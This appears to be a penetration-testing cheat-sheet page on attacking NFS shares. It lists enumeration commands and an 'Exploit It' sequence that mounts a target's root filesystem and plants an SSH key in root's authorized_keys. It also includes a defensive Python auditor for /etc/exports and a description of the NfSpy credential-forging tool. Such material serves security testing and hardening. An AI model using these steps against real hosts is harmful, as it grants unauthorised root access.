NFS (2049)

In default configurations, the remote NFS server will map the UID/GID of the connecting user. For example, if ‘int0x33’ is my local user account, and /etc/passwd and /etc/group have assigned me a uid and gid of 3333, then on connecting to a remote NFS share I’ll have access as that same uid and gid on the remote system, regardless of which username the remote system has assigned to them; this includes root.

Enumeration

# Registered RPC services (confirms nfs and mountd are present)
root@box:~# rpcinfo -p 10.10.10.10
# All Mount Points
root@box:~# showmount -a 10.10.10.10
# Export List
root@box:~# showmount -e 10.10.10.10
# Directories
root@box:~# showmount -d 10.10.10.10
# Hosts
root@box:~# showmount 10.10.10.10

Exploit It

root@box:~# ssh-keygen
root@box:~# mkdir /tmp/r00t
root@box:~# mount -t nfs 10.10.10.10:/ /tmp/r00t/
root@box:~# cat ~/.ssh/id_rsa.pub >> /tmp/r00t/root/.ssh/authorized_keys
root@box:~# umount /tmp/r00t
root@box:~# ssh root@10.10.10.10

Configuration Files

  • /etc/exports
  • /var/lib/nfs/xtab
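
As an added example (not part of the original page), a small Python auditor for /etc/exports that reports the settings which let a client's self-declared uid/gid count on the server: no_root_squash, exports to every host, and the "host (opts)" spacing mistake that exportfs treats as an export to <world>. The sample exports content is constructed; the defaults (ro, sync, root_squash, secure) are exportfs' documented defaults.

```python
import re

# Constructed sample /etc/exports (not taken from any real host).
SAMPLE_EXPORTS = """\
# /etc/exports: see exports(5)
/srv/public    *(rw,sync,no_root_squash,no_subtree_check)
/home          10.10.10.0/24(rw,sync,root_squash) *(ro)
/srv/legacy    *
/srv/oops      10.10.10.5 (rw)
"""

# One client entry: host, optionally followed (with no space) by "(options)".
ENTRY_RE = re.compile(r'(\S*?)(?:\((.*?)\))?(?=\s|$)')
# exportfs defaults when an option is not given, and the option each one overrides.
DEFAULTS = {'ro', 'sync', 'root_squash', 'secure'}
OPPOSITE = {'rw': 'ro', 'no_root_squash': 'root_squash', 'insecure': 'secure',
            'async': 'sync', 'ro': 'rw', 'root_squash': 'no_root_squash'}

def parse_exports(text: str) -> list:
    """(path, client, [options]) triples; a bare "(opts)" has client '' = <world>."""
    entries = []
    for raw in text.splitlines():
        line = raw.split('#', 1)[0].strip()
        if not line:
            continue
        path, *rest = line.split(None, 1)
        for m in ENTRY_RE.finditer(rest[0] if rest else ''):
            if m.group(0):                      # skip empty matches at whitespace
                opts = m.group(2).split(',') if m.group(2) is not None else []
                entries.append((path, m.group(1), [o.strip() for o in opts]))
    return entries

def audit_exports(text: str) -> list:
    """(path, client, finding) triples for settings that trust the remote uid/gid."""
    findings = []
    for path, client, opts in parse_exports(text):
        eff = set(DEFAULTS)
        for o in opts:                          # later options override earlier ones
            eff.discard(OPPOSITE.get(o, ''))
            eff.add(o)
        world = client in ('*', '')
        if client == '':
            findings.append((path, client, 'space_pitfall'))   # "host (opts)" exports to <world>
        if 'no_root_squash' in eff and 'all_squash' not in eff:
            findings.append((path, client, 'no_root_squash'))  # remote uid 0 is root here
        if world and 'rw' in eff:
            findings.append((path, client, 'world_rw'))
        if world and 'all_squash' not in eff:
            findings.append((path, client, 'world_authsys'))   # any host, any uid/gid honoured
    return findings
```

Run it against a real /etc/exports with `audit_exports(open('/etc/exports').read())`; an empty list means no world or unsquashed-root exports were found.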

NfSpy

https://github.com/int0x33/NfSpy

NfSpy is a Python library for automating the falsification of NFS credentials when mounting an NFS share. Included are two client programs:

  • nfspy uses the Filesystem in Userspace (FUSE) library to mount an NFS share in Linux. This allows the use of any regular file-searching and manipulation programs like grep and find to explore the NFS export.
  • nfspysh is an ftp-like interactive shell for exploring NFS exports. It does not require the FUSE library, so it can run on non-Linux platforms.